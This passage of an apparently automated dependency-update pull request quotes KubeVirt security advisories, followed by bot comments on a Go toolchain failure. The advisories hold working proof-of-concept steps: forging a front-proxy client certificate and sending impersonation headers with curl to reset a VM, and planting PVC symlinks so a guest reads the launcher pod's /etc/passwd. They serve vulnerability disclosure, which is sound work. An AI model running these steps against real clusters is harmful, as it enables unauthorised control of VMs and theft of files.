    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1alpha3"
  ]
}

The virt-api service has two types of endpoints -- authenticated and non-authenticated:

// pkg/authorizer/authorizer.go

var noAuthEndpoints = map[string]struct{}{
	"/":           {},
	"/apis":       {},
	"/healthz":    {},
	"/openapi/v2": {},
	// Although KubeVirt does not publish v3, Kubernetes aggregator controller will
	// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint
	"/openapi/v3": {},
	// The endpoints with just the version are needed for api aggregation discovery
	// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1
	"/apis/subresources.kubevirt.io/v1":               {},
	"/apis/subresources.kubevirt.io/v1/version":       {},
	"/apis/subresources.kubevirt.io/v1/guestfs":       {},
	"/apis/subresources.kubevirt.io/v1/healthz":       {},
	"/apis/subresources.kubevirt.io/v1alpha3":         {},
	"/apis/subresources.kubevirt.io/v1alpha3/version": {},
	"/apis/subresources.kubevirt.io/v1alpha3/guestfs": {},
	"/apis/subresources.kubevirt.io/v1alpha3/healthz": {},
	// the profiler endpoints are blocked by a feature gate
	// to restrict the usage to development environments
	"/start-profiler": {},
	"/stop-profiler":  {},
	"/dump-profiler":  {},
	"/apis/subresources.kubevirt.io/v1/start-cluster-profiler":       {},
	"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler": {},
	"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler":  {},
	"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler":  {},
}

Each endpoint which is not in this list is considered an authenticated endpoint and requires a valid client certificate to be presented by the caller.
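
In other words, the gate is a plain allow-list lookup. A minimal sketch of the implied logic over the map above, using a hypothetical helper name:

// hypothetical helper illustrating the allow-list gate over noAuthEndpoints
func requiresClientAuth(path string) bool {
	_, exempt := noAuthEndpoints[path]
	return !exempt
}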

##### trying to reach an API endpoint not in the above list would require client authentication
attacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1
request is not authenticated

To illustrate the vulnerability and attack scenario, a certificate is generated below that is signed by the front-proxy-ca but issued to an entity different from front-proxy-client (i.e., the certificate has a different CN). Later on, it is assumed that the attacker has obtained access to this certificate bundle:

attacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key
attacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj "/CN=crypt0n1t3/O=Quarkslab/C=Fr"
attacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out rogue-front-proxy.crt -days 365

The authentication will now succeed:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key  https://10.244.0.6:8443/v1
a valid user header is required for authorization

To fully exploit the vulnerability, the attacker must also provide valid authentication HTTP headers:

attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/v1
unknown api endpoint: /subresource.kubevirt.io/v1

The virt-api is a sub-resource extension server - it handles only requests for specific resources and sub-resources (requests having URIs prefixed with /apis/subresources.kubevirt.io/v1/). In reality, most of the requests that it accepts are actually executed by the virt-handler component and are related to the lifecycle of a VM.

Hence, virt-handler's API can be seen as aggregated within virt-api's API, which effectively turns virt-api into a proxy.

The endpoints which are handled by virt-api are listed in the Swagger definitions available on GitHub.

Resetting a Virtual Machine Instance

Consider the following deployed VirtualMachineInstance (VMI) within the default namespace:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  namespace: default
  name: mishandling-common-name-in-certificate-default
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio

      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

An attacker with a stolen external authentication proxy certificate could easily reset (hard reboot), freeze, or remove volumes from the virtual machine.

root@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key  -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT

HTTP/1.1 200 OK
Date: Sun, 18 May 2025 16:43:26 GMT
Content-Length: 0

Impact


The virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.

Severity

  • CVSS Score: 4.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

KubeVirt Arbitrary Container File Read in kubevirt.io/kubevirt

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


KubeVirt Arbitrary Container File Read

CVE-2025-64433 / GHSA-qw6q-3pgr-5cwq / GO-2025-4109

More information

Details

Summary


Mounting a user-controlled PVC disk within a VM allows an attacker to read any file present in the virt-launcher pod. This is due to erroneous handling of symlinks defined within a PVC.

Details


A vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod's file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod's file system. Since libvirt can treat regular files as block devices, any file on the pod's file system that is symlinked in this way can be mounted into the VM and subsequently read.

Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability (TODO: put link here). The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod's file system or on a mounted PVC from within the guest VM.
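
As an illustration of one possible mitigation (a sketch with assumed names, not the actual fix), the disk image path could be fully resolved and required to stay inside the PVC mount before any chown or mount takes place:

// hypothetical path-containment check (illustrative names)
package hostdisk

import (
	"fmt"
	"path/filepath"
	"strings"
)

// safeDiskPath resolves disk.img fully and rejects it if the real path
// escapes the PVC mount, so a symlink cannot point into the pod's rootfs.
func safeDiskPath(pvcRoot, name string) (string, error) {
	resolved, err := filepath.EvalSymlinks(filepath.Join(pvcRoot, name))
	if err != nil {
		return "", err
	}
	root, err := filepath.EvalSymlinks(pvcRoot)
	if err != nil {
		return "", err
	}
	if resolved != root && !strings.HasPrefix(resolved, root+string(filepath.Separator)) {
		return "", fmt.Errorf("%s escapes PVC mount %s", resolved, root)
	}
	return resolved, nil
}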

PoC


Consider that an attacker has control over the contents of two PVCs (e.g., from within a container) and creates the following symlinks:

##### The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---

##### The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will allocate the claim as a directory on the host node (HostPath). Once the above Kubernetes resources are created, the user can create the symlinks within the PVC as follows:

##### Using the `pvc-arbitrary-container-read-1` PVC we want to read the default XML configuration generated by `virt-launcher` for `libvirt`. Hence, the attacker has to create a symlink including the name of the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

##### With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ ln -s ../../../../../../../../etc/passwd disk.img
attacker@dual-pvc-pod:/mnt/data2 $ ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could be broken, as the target files, especially default_arbitrary-container-read.xml, may not exist on the dual-pvc-pod pod's file system. The attacker then deploys the following VM:

##### arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode. From the documentation of the different volume modes, one can infer that if the backing disk.img is not owned by the unprivileged user with UID 107, the VM should fail to mount it. In addition, this backing file is expected to be in RAW format. While this format can contain pretty much anything, we consider that being able to mount a file from the file system of virt-launcher is not the expected behaviour. Below, it is demonstrated that after applying the VM manifest, the guest can read the /etc/passwd and default_arbitrary-container-read.xml files from the virt-launcher pod's file system:

##### Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created

##### Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True

##### Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read
##### Within the `arbitrary-container-read` VM, inspect the available block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk

##### Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash

##### Inspect the mounted `default_arbitrary-container-read.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>

operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m

##### Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

##### Inspect the ownership of the `/etc/passwd` file of the ` virt-launcher` pod 
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd

Impact


This vulnerability breaches the container-to-VM isolation boundary, compromising the confidentiality of storage data.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


KubeVirt Vulnerable to Arbitrary Host File Read and Write

CVE-2025-64324 / GHSA-46xp-26xh-hpqh / GO-2025-4110

More information

Details

Summary

The hostDisk feature in KubeVirt allows mounting a host file or directory owned b

@redhat-renovate-bot redhat-renovate-bot added the release-note-none Denotes a PR that doesn't merit a release note. label Apr 20, 2026
redhat-renovate-bot (Collaborator, Author) commented Apr 20, 2026

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: downloading cel.dev/expr v0.24.0
go: downloading google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb
go: downloading google.golang.org/grpc v1.72.1
go: downloading github.com/go-jose/go-jose/v4 v4.0.5
go: downloading github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.3
go: downloading google.golang.org/genproto/googleapis/rpc v0.0.0-20250303144028-a0af3efb3deb
go: k8s.io/api@v0.36.0 requires go >= 1.26.0 (running go 1.25.8)
go: k8s.io/api@v0.36.0 requires go >= 1.26.0 (running go 1.25.8)
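
The failure is a Go toolchain version mismatch: the updated dependency tree pulls in k8s.io/api v0.36.0, which requires Go 1.26.0, while the build environment runs Go 1.25.8. A likely remediation, assuming this branch can move to the newer toolchain, is to bump the go directive in go.mod:

// go.mod (sketch; assumes Go 1.26 is acceptable for this release branch)
go 1.26.0

After that, go get -t ./... should be able to resolve the module graph again.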

@kubevirt-bot kubevirt-bot added the dco-signoff: yes Indicates the PR's author has DCO signed all their commits. label Apr 20, 2026
@openshift-ci openshift-ci Bot requested review from 0xFelix and ksimon1 April 20, 2026 16:28
openshift-ci bot commented Apr 20, 2026

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by: redhat-renovate-bot
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

kubevirt-bot (Contributor) commented

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign 0xfelix for approval. For more information see the Code Review Process.

The full list of commands accepted by this bot can be found here.

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@kubevirt-bot kubevirt-bot requested a review from akrejcir April 20, 2026 16:28
@redhat-renovate-bot redhat-renovate-bot changed the title chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) - autoclosed Apr 25, 2026
@redhat-renovate-bot redhat-renovate-bot deleted the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch April 25, 2026 16:06
Signed-off-by: null <redhat-internal-renovate@redhat.com>
@redhat-renovate-bot redhat-renovate-bot changed the title chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) - autoclosed chore(deps): update module kubevirt.io/kubevirt to v1.8.2 [security] (release-v0.24) Apr 25, 2026
@redhat-renovate-bot redhat-renovate-bot force-pushed the renovate/release-v0.24-go-kubevirt.io-kubevirt-vulnerability branch 2 times, most recently from cd94a0c to 8918e6b Compare April 25, 2026 20:36
openshift-ci bot commented Apr 25, 2026

@redhat-renovate-bot: The following tests failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name | Commit | Details | Required | Rerun command
ci/prow/images | 8918e6b | link | true | /test images
ci/prow/e2e-tests | 8918e6b | link | true | /test e2e-tests

Full PR test history. Your PR dashboard.


Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

